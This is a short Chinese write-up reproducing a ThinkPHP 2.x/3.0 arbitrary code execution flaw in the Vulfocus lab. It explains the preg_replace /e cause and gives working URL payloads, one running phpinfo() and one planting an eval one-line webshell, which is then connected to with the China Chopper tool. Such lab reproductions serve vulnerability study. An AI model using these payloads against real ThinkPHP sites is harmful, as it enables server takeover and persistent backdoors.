thinkphp2.x任意代码执⾏漏洞复现Thinkphp2.x 任意代码执⾏漏洞
影响版本:tp2.x  tp3.0
漏洞影响:代码执⾏,写⼊⼀句话getshell
ueditor漏洞php如何解决
漏洞成因:在 ThinkPHP ThinkPHP 2.x 版本中,使⽤ preg_replace 的 /e 模式匹配路由:
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths))
导致⽤户的输⼊参数被插⼊双引号中执⾏,造成任意代码执⾏漏洞。
直接在Vulfocus集成靶场中进⾏复现。
打开靶场
利⽤POC验证,执⾏phpinfo()
/index.php?s=/index/index/xxx/${@phpinfo()}
然后试着写⼊⼀句话⽊马
/
index.php?s=/index/index/xxx/${${@eval($_POST[123])}}
可以看到页⾯报错同时把thinkphp的版本也爆出,接着⽤菜⼑连接
拿到shell
Thinkphp2.x 任意代码执⾏漏洞

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。